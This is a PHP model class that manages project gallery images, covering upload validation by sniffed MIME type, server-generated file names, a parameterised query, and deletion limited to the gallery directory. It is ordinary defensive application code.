Viewing: ProjectImage.php
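<?php

/**
 * Gallery images attached to a project: stores uploaded files under
 * storage/uploads/projects/gallery and keeps one `project_images` row per file.
 */
class ProjectImage extends BaseModel
{
    protected string $table = 'project_images';

    protected array $fillable = ['project_id', 'image_path', 'created_at'];

    /**
     * Store every successfully uploaded file of a multi-file upload field and
     * record it against the project.
     *
     * @param int   $projectId Project the images belong to.
     * @param array $files     Multi-file upload array, i.e. `name`, `type`, `tmp_name`,
     *                         `error` and `size` each holding a list indexed per file.
     */
    public function addImages(int $projectId, array $files): void
    {
        $count = count($files['name'] ?? []);

        for ($i = 0; $i < $count; $i++) {
            // Skip slots that were left empty or failed in transit.
            if (($files['error'][$i] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
                continue;
            }

            // Re-shape the i-th entry into the single-file layout upload() expects.
            // Missing keys fall back to empty values so a malformed array is
            // rejected by validImage() instead of raising warnings.
            $single = [
                'name' => $files['name'][$i] ?? '',
                'type' => $files['type'][$i] ?? '',
                'tmp_name' => $files['tmp_name'][$i] ?? '',
                'error' => $files['error'][$i],
                'size' => $files['size'][$i] ?? 0,
            ];

            $path = $this->upload($single);
            if ($path) {
                $this->create(['project_id' => $projectId, 'image_path' => $path]);
            }
        }
    }

    /**
     * Fetch all image rows of a project, newest id first.
     *
     * @param int $projectId Project whose images are wanted.
     * @return array Rows as returned by fetchAll() on the prepared statement.
     */
    public function getByProject(int $projectId): array
    {
        // Bound parameter: the project id never becomes part of the SQL text.
        $statement = $this->db->prepare(
            'SELECT * FROM project_images WHERE project_id = :project_id ORDER BY id DESC'
        );
        $statement->execute(['project_id' => $projectId]);

        return $statement->fetchAll();
    }

    /**
     * Remove an image's file (when the row exists) and then its database row.
     *
     * @param int $id Primary key of the image row.
     * @return bool Result of the inherited delete().
     */
    public function deleteImage(int $id): bool
    {
        $image = $this->find($id);
        if ($image) {
            $this->deleteFile($image['image_path']);
        }

        return $this->delete($id);
    }

    /**
     * Decide whether one uploaded file may be stored as a gallery image.
     *
     * The decisive check is the MIME type sniffed from the file content; the
     * client-supplied `type` field is never consulted. The extension denylist is
     * only a secondary filter: upload() never reuses the client file name, it
     * derives the stored extension from the detected MIME type.
     *
     * @param array $file Single-file upload array (`name`, `tmp_name`, `error`, ...).
     * @return bool True when the content is JPEG, PNG or WebP and the name is not denylisted.
     */
    public function validImage(array $file): bool
    {
        if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
            return false;
        }

        $name = $file['name'] ?? '';
        $tmpName = $file['tmp_name'] ?? '';

        // Reject malformed entries up front instead of letting pathinfo() or
        // mime_content_type() warn on a missing or non-string value.
        if (!is_string($name) || !is_string($tmpName) || $tmpName === '' || !is_file($tmpName)) {
            return false;
        }

        $extension = strtolower(pathinfo($name, PATHINFO_EXTENSION));
        if (in_array($extension, ['php', 'js', 'html', 'svg', 'phtml', 'phar'], true)) {
            return false;
        }

        // mime_content_type() returns false on failure, which is not in the list.
        // NOTE(review): content sniffing does not prove the whole file is a clean
        // image; the gallery directory should be served without script execution
        // - confirm the web server configuration.
        return in_array(mime_content_type($tmpName), ['image/jpeg', 'image/png', 'image/webp'], true);
    }

    /**
     * Move a validated upload into the gallery directory under a generated name.
     *
     * @param array $file Single-file upload array.
     * @return string|null Path relative to ROOT_PATH on success, null when the file is
     *                     rejected, the directory cannot be created, or the move fails.
     */
    private function upload(array $file): ?string
    {
        if (!$this->validImage($file)) {
            return null;
        }

        $extensions = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/webp' => 'webp'];
        $mime = mime_content_type($file['tmp_name']);

        // The type is detected a second time here; refuse rather than index the
        // map with an unexpected value if the two detections ever disagree.
        $extension = is_string($mime) ? ($extensions[$mime] ?? null) : null;
        if ($extension === null) {
            return null;
        }

        // Server-generated name: timestamp plus 6 random bytes, so nothing from
        // the client-supplied file name reaches the filesystem.
        $filename = 'gallery_' . date('YmdHis') . '_' . bin2hex(random_bytes(6)) . '.' . $extension;
        $directory = ROOT_PATH . '/storage/uploads/projects/gallery';

        // The second is_dir() covers a concurrent request creating the directory.
        if (!is_dir($directory) && !mkdir($directory, 0775, true) && !is_dir($directory)) {
            return null;
        }

        $destination = $directory . '/' . $filename;

        // move_uploaded_file() only moves files that arrived via HTTP POST upload.
        return move_uploaded_file($file['tmp_name'], $destination)
            ? 'storage/uploads/projects/gallery/' . $filename
            : null;
    }

    /**
     * Delete a stored image file, but only if it resolves to a regular file
     * inside the gallery directory.
     *
     * @param string|null $path Path relative to ROOT_PATH as stored in `image_path`.
     */
    private function deleteFile(?string $path): void
    {
        if (!$path) {
            return;
        }

        // realpath() resolves `..` segments and symlinks and returns false for
        // paths that do not exist.
        $target = realpath(ROOT_PATH . '/' . ltrim($path, '/'));
        $base = realpath(ROOT_PATH . '/storage/uploads/projects/gallery');
        if (!$target || !$base) {
            return;
        }

        // Compare against the directory WITH a trailing separator. A bare prefix
        // match would also accept sibling paths whose name merely starts with
        // "gallery", which lie outside the gallery directory.
        $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (str_starts_with($target, $prefix) && is_file($target)) {
            unlink($target);
        }
    }
}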